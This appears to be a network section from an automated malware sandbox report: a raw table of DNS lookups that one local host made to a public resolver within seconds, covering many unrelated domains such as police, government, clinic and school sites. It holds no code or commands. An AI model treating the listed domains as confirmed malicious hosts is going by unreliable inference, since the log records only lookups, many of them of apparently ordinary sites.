                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.782907009 CEST1.1.1.1192.168.2.30x5d6No error (0)clinicasanluis.com.co172.67.164.178A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.782907009 CEST1.1.1.1192.168.2.30x5d6No error (0)clinicasanluis.com.co104.21.66.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.785339117 CEST1.1.1.1192.168.2.30xd4afNo error (0)nme.co.jp203.0.113.0A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.786523104 CEST1.1.1.1192.168.2.30xc5eeNo error (0)ldh.la.gov75.2.95.235A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.803132057 CEST1.1.1.1192.168.2.30x22b8No error (0)bount.com.tw104.21.76.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.803132057 CEST1.1.1.1192.168.2.30x22b8No error (0)bount.com.tw172.67.196.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.869997978 CEST1.1.1.1192.168.2.30x77c1Server failure (2)www.koz1.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.870033026 CEST1.1.1.1192.168.2.30x77c1Server failure (2)www.koz1.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.870073080 CEST1.1.1.1192.168.2.30x77c1Server failure (2)www.koz1.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.882396936 CEST1.1.1.1192.168.2.30xce2eNo error (0)yoruksut.com93.187.206.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.895282984 CEST1.1.1.1192.168.2.30x77c1Server failure (2)www.koz1.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.932391882 CEST1.1.1.1192.168.2.30xbd4Name error (3)kayoaiba.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.937819958 CEST1.1.1.1192.168.2.30x8436No error (0)sjbmw.com164.92.82.47A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.956268072 CEST1.1.1.1192.168.2.30xc34No error (0)nblewis.com35.169.15.168A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.956268072 CEST1.1.1.1192.168.2.30xc34No error (0)nblewis.com35.168.185.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.956268072 CEST1.1.1.1192.168.2.30xc34No error (0)nblewis.com52.0.29.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.987850904 CEST1.1.1.1192.168.2.30xce2eNo error (0)yoruksut.com93.187.206.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:55.001580000 CEST1.1.1.1192.168.2.30xba92No error (0)agulatex.com133.125.38.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:55.035537004 CEST1.1.1.1192.168.2.30x8753No error (0)karmy.com.pl185.253.212.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:55.045526028 CEST1.1.1.1192.168.2.30x9898No error (0)pleszew.policja.gov.pl91.229.22.126A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:55.071245909 CEST1.1.1.1192.168.2.30x8161No error (0)fr-dat.com127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:55.143718958 CEST1.1.1.1192.168.2.30xa309No error (0)araax.comtraff-2.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:55.143718958 CEST1.1.1.1192.168.2.30xa309No error (0)traff-2.hugedomains.comhdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:55.143718958 CEST1.1.1.1192.168.2.30xa309No error (0)hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com3.130.253.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:55.143718958 CEST1.1.1.1192.168.2.30xa309No error (0)hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com3.130.204.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:55.158860922 CEST1.1.1.1192.168.2.30x20a6No error (0)diamir.de94.130.146.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:55.172394991 CEST1.1.1.1192.168.2.30x19d0No error (0)pers.com192.124.249.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:55.180002928 CEST1.1.1.1192.168.2.30x1a8No error (0)www.sclover3.com157.112.182.239A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:55.188205004 CEST1.1.1.1192.168.2.30x3d4dNo error (0)indonesiamedia.com74.208.215.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:55.204301119 CEST1.1.1.1192.168.2.30x8946No error (0)dbnet.at188.94.254.88A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:55.301486969 CEST1.1.1.1192.168.2.30x9862No error (0)xult.org65.52.128.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:55.337415934 CEST1.1.1.1192.168.2.30x1696No error (0)msl-lock.com165.160.15.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:55.337415934 CEST1.1.1.1192.168.2.30x1696No error (0)msl-lock.com165.160.13.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:55.418119907 CEST1.1.1.1192.168.2.30xb351No error (0)a-domani.com183.90.232.24A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:55.444849968 CEST1.1.1.1192.168.2.30x14e6No error (0)s5w.com192.99.226.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:55.512612104 CEST1.1.1.1192.168.2.30xc001No error (0)muhr-soehne.de5.189.171.125A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:55.534128904 CEST1.1.1.1192.168.2.30x2df1No error (0)dwid.de87.230.93.218A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:55.671091080 CEST1.1.1.1192.168.2.30x8ce6No error (0)tozzhin.com202.94.166.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:55.689017057 CEST1.1.1.1192.168.2.30x1e68No error (0)pccj.net104.21.29.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:55.689017057 CEST1.1.1.1192.168.2.30x1e68No error (0)pccj.net172.67.148.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:55.701889038 CEST1.1.1.1192.168.2.30xa18fNo error (0)kavram.com172.67.189.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:55.701889038 CEST1.1.1.1192.168.2.30xa18fNo error (0)kavram.com104.21.89.126A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:55.812709093 CEST1.1.1.1192.168.2.30xbf6bNo error (0)karila.fr89.107.169.125A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:55.815167904 CEST1.1.1.1192.168.2.30xb7f6Server failure (2)awfraser.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:55.815185070 CEST1.1.1.1192.168.2.30xb7f6Server failure (2)awfraser.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:55.825555086 CEST1.1.1.1192.168.2.30x71a2No error (0)yhsll.com38.36.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:55.844290972 CEST1.1.1.1192.168.2.30xdd3bNo error (0)adventist.ro49.12.155.123A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:55.854962111 CEST1.1.1.1192.168.2.30x94d5No error (0)sgk.home.pl89.161.136.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:55.881696939 CEST1.1.1.1192.168.2.30xb7f6Server failure (2)awfraser.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:55.949799061 CEST1.1.1.1192.168.2.30xd775No error (0)koz1.net34.94.245.237A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:55.950167894 CEST1.1.1.1192.168.2.30xd775No error (0)koz1.net34.94.245.237A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:55.950218916 CEST1.1.1.1192.168.2.30xd775No error (0)koz1.net34.94.245.237A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:56.001120090 CEST1.1.1.1192.168.2.30x8c2aNo error (0)pccj.net172.67.148.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:56.001120090 CEST1.1.1.1192.168.2.30x8c2aNo error (0)pccj.net104.21.29.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:56.001801968 CEST1.1.1.1192.168.2.30x206fNo error (0)mjrcpas.com204.11.56.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:56.075747013 CEST1.1.1.1192.168.2.30x2f62No error (0)nrsi.com76.223.35.103A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:56.117172003 CEST1.1.1.1192.168.2.30xadf2No error (0)portoccd.org51.89.6.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:56.143172979 CEST1.1.1.1192.168.2.30x2e84No error (0)ntc.edu.au192.124.249.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:56.143202066 CEST1.1.1.1192.168.2.30x2e84No error (0)ntc.edu.au192.124.249.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:56.195938110 CEST1.1.1.1192.168.2.30x6bd5No error (0)okashimo.com203.137.75.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:56.225251913 CEST1.1.1.1192.168.2.30x2e84No error (0)ntc.edu.au192.124.249.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:56.285141945 CEST1.1.1.1192.168.2.30x5fd1No error (0)noblesse.be5.134.4.115A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:56.293596029 CEST1.1.1.1192.168.2.30xcab9No error (0)gbmfg.com151.101.2.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:56.293596029 CEST1.1.1.1192.168.2.30xcab9No error (0)gbmfg.com151.101.130.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:56.293596029 CEST1.1.1.1192.168.2.30xcab9No error (0)gbmfg.com151.101.66.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:56.293596029 CEST1.1.1.1192.168.2.30xcab9No error (0)gbmfg.com151.101.194.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:56.308353901 CEST1.1.1.1192.168.2.30x206fNo error (0)web-york.com219.94.129.97A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:56.317317963 CEST1.1.1.1192.168.2.30x5bbNo error (0)hbfuels.com85.233.160.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:56.407286882 CEST1.1.1.1192.168.2.30x1306No error (0)aiolos-sa.gr104.21.26.121A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:56.407286882 CEST1.1.1.1192.168.2.30x1306No error (0)aiolos-sa.gr172.67.168.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:56.520787001 CEST1.1.1.1192.168.2.30x407fNo error (0)sidepath.com99.83.190.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:56.520787001 CEST1.1.1.1192.168.2.30x407fNo error (0)sidepath.com34.193.204.92A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:56.520787001 CEST1.1.1.1192.168.2.30x407fNo error (0)sidepath.com34.193.69.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:56.520787001 CEST1.1.1.1192.168.2.30x407fNo error (0)sidepath.com75.2.70.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:56.735179901 CEST1.1.1.1192.168.2.30xaaeaNo error (0)wanoa.com159.89.244.183A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:56.735179901 CEST1.1.1.1192.168.2.30xaaeaNo error (0)wanoa.com164.90.244.158A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:56.807199001 CEST1.1.1.1192.168.2.30xf082No error (0)ruzee.com207.180.198.201A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:56.883337021 CEST1.1.1.1192.168.2.30xeaabNo error (0)midap.com198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:56.883337021 CEST1.1.1.1192.168.2.30xeaabNo error (0)midap.com198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:56.883337021 CEST1.1.1.1192.168.2.30xeaabNo error (0)midap.com198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:56.883337021 CEST1.1.1.1192.168.2.30xeaabNo error (0)midap.com198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:56.974437952 CEST1.1.1.1192.168.2.30xe72fNo error (0)ascc.org.au203.210.102.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:57.079721928 CEST1.1.1.1192.168.2.30xf093No error (0)semuk.com86.105.245.69A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:57.084131956 CEST1.1.1.1192.168.2.30xee1bNo error (0)jnf.at136.243.147.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:57.086247921 CEST1.1.1.1192.168.2.30xc498Server failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:57.086286068 CEST1.1.1.1192.168.2.30xc498Server failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:57.086476088 CEST1.1.1.1192.168.2.30xc498Server failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:57.143199921 CEST1.1.1.1192.168.2.30x887eNo error (0)lyto.net104.21.62.182A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:57.143199921 CEST1.1.1.1192.168.2.30x887eNo error (0)lyto.net172.67.138.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:57.205744028 CEST1.1.1.1192.168.2.30x929cNo error (0)cvswl.org172.67.149.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:57.205744028 CEST1.1.1.1192.168.2.30x929cNo error (0)cvswl.org104.21.55.151A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:57.212342978 CEST1.1.1.1192.168.2.30x5f62No error (0)btsi.com.ph69.46.30.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:57.222995043 CEST1.1.1.1192.168.2.30x8806No error (0)skgm.ru91.201.52.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:57.336992979 CEST1.1.1.1192.168.2.30xc7e1No error (0)envogen.com172.67.163.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:57.336992979 CEST1.1.1.1192.168.2.30xc7e1No error (0)envogen.com104.21.73.149A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:57.386337996 CEST1.1.1.1192.168.2.30x4bf9No error (0)e-kami.net202.172.28.89A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:57.398109913 CEST1.1.1.1192.168.2.30x1a8aNo error (0)603888.comnum6.17986.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:57.398109913 CEST1.1.1.1192.168.2.30x1a8aNo error (0)num6.17986.net67.21.93.229A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:57.544037104 CEST1.1.1.1192.168.2.30x8260Name error (3)www.owsports.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:57.559204102 CEST1.1.1.1192.168.2.30xde84No error (0)revoldia.net154.201.225.123A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:57.643413067 CEST1.1.1.1192.168.2.30x1b79Name error (3)89gospel.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:57.822426081 CEST1.1.1.1192.168.2.30xa0f4No error (0)t-trust.jp183.181.82.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:57.851627111 CEST1.1.1.1192.168.2.30x5300No error (0)gydrozo.ru91.220.211.163A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:57.882339954 CEST1.1.1.1192.168.2.30xfe95No error (0)enguita.net195.5.116.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:58.044183969 CEST1.1.1.1192.168.2.30xeb3bNo error (0)anduran.comtraff-3.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:58.044183969 CEST1.1.1.1192.168.2.30xeb3bNo error (0)traff-3.hugedomains.comhdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:58.044183969 CEST1.1.1.1192.168.2.30xeb3bNo error (0)hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com3.19.116.195A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:58.044183969 CEST1.1.1.1192.168.2.30xeb3bNo error (0)hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com3.18.7.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:58.096327066 CEST1.1.1.1192.168.2.30x4293Server failure (2)mondopp.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:58.096472979 CEST1.1.1.1192.168.2.30x4293Server failure (2)mondopp.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:58.096491098 CEST1.1.1.1192.168.2.30x4293Server failure (2)mondopp.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:58.113153934 CEST1.1.1.1192.168.2.30x4293Server failure (2)mondopp.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:58.117846012 CEST1.1.1.1192.168.2.30xa6a8No error (0)www.diamir.de94.130.146.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:58.176120996 CEST1.1.1.1192.168.2.30xf90fNo error (0)umcor.am172.67.135.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:58.176120996 CEST1.1.1.1192.168.2.30xf90fNo error (0)umcor.am104.21.6.168A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:58.200041056 CEST1.1.1.1192.168.2.30xba6dNo error (0)xinhui.net43.255.29.192A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:58.214541912 CEST1.1.1.1192.168.2.30x5b54No error (0)nels.co.uk5.134.13.210A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:58.224601030 CEST1.1.1.1192.168.2.30x1aa1No error (0)burstner.ru62.122.170.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:58.236001015 CEST1.1.1.1192.168.2.30x1886No error (0)78san.com133.242.15.119A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:58.312381029 CEST1.1.1.1192.168.2.30x63fdNo error (0)duiops.net135.125.108.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:58.524777889 CEST1.1.1.1192.168.2.30xad98Server failure (2)canmore.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:58.563107967 CEST1.1.1.1192.168.2.30xcfe9No error (0)fortknox.bm216.177.137.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:58.837852001 CEST1.1.1.1192.168.2.30xa67No error (0)host.do217.79.248.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:58.928699017 CEST1.1.1.1192.168.2.30x7e43Server failure (2)avc.com.sanonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:58.963736057 CEST1.1.1.1192.168.2.30x2a49No error (0)ncn.de46.30.60.158A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:59.092715025 CEST1.1.1.1192.168.2.30x8ad9No error (0)oozkranj.com212.44.102.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:59.129586935 CEST1.1.1.1192.168.2.30xe2dNo error (0)from30ty.com157.7.231.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:59.242901087 CEST1.1.1.1192.168.2.30x3bcfNo error (0)tcpoa.com164.90.244.158A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:59.242901087 CEST1.1.1.1192.168.2.30x3bcfNo error (0)tcpoa.com159.89.244.183A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:59.244601011 CEST1.1.1.1192.168.2.30xf966Server failure (2)awfraser.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:59.244632959 CEST1.1.1.1192.168.2.30xf966Server failure (2)awfraser.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:59.255322933 CEST1.1.1.1192.168.2.30xa264No error (0)valselit.com193.70.68.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:59.301115990 CEST1.1.1.1192.168.2.30xf966Server failure (2)awfraser.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:59.315488100 CEST1.1.1.1192.168.2.30x1b8eNo error (0)websy.com76.223.54.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:59.315488100 CEST1.1.1.1192.168.2.30x1b8eNo error (0)websy.com13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:59.355678082 CEST1.1.1.1192.168.2.30x9f91No error (0)wvs-net.de172.67.181.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:59.355678082 CEST1.1.1.1192.168.2.30x9f91No error (0)wvs-net.de104.21.43.163A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:59.473016024 CEST1.1.1.1192.168.2.30x75eeName error (3)anteph.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:59.483011961 CEST1.1.1.1192.168.2.30xac2eServer failure (2)someikan.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:59.498200893 CEST1.1.1.1192.168.2.30x92cName error (3)www.jroy.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:59.500570059 CEST1.1.1.1192.168.2.30x7849No error (0)anduran.comtraff-3.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:59.500570059 CEST1.1.1.1192.168.2.30x7849No error (0)traff-3.hugedomains.comhdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:59.500570059 CEST1.1.1.1192.168.2.30x7849No error (0)hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com3.19.116.195A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:59.500570059 CEST1.1.1.1192.168.2.30x7849No error (0)hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com3.18.7.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:59.503676891 CEST1.1.1.1192.168.2.30x774aNo error (0)gphpedit.org127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:59.515692949 CEST1.1.1.1192.168.2.30x8677No error (0)dzm.cz83.167.255.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:59.529422045 CEST1.1.1.1192.168.2.30x18b2No error (0)akdeniz.nl109.71.54.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:59.634042025 CEST1.1.1.1192.168.2.30xb01aNo error (0)nettlinx.org202.53.77.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:59.634073019 CEST1.1.1.1192.168.2.30xb01aNo error (0)nettlinx.org202.53.77.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:59.858974934 CEST1.1.1.1192.168.2.30xbd19No error (0)epc.com.au103.4.16.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:59.983922958 CEST1.1.1.1192.168.2.30x4ea0Name error (3)agitz.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:00.335083961 CEST1.1.1.1192.168.2.30x8d3eNo error (0)com-edit.fr34.174.61.199A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:00.335148096 CEST1.1.1.1192.168.2.30x8d3eNo error (0)com-edit.fr34.174.61.199A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:00.360393047 CEST1.1.1.1192.168.2.30x235cNo error (0)sledsport.ru185.22.232.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:00.542318106 CEST1.1.1.1192.168.2.30xb076No error (0)hubbikes.com75.2.70.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:00.542318106 CEST1.1.1.1192.168.2.30xb076No error (0)hubbikes.com99.83.190.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:00.768707991 CEST1.1.1.1192.168.2.30x6db3No error (0)wnit.org38.111.255.201A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:00.792701006 CEST1.1.1.1192.168.2.30x49c8No error (0)www.clinicasanluis.com.co104.21.66.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:00.792701006 CEST1.1.1.1192.168.2.30x49c8No error (0)www.clinicasanluis.com.co172.67.164.178A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:00.890212059 CEST1.1.1.1192.168.2.30xed3fNo error (0)gcss.com15.197.204.56A (IP address)IN (0x0001)false
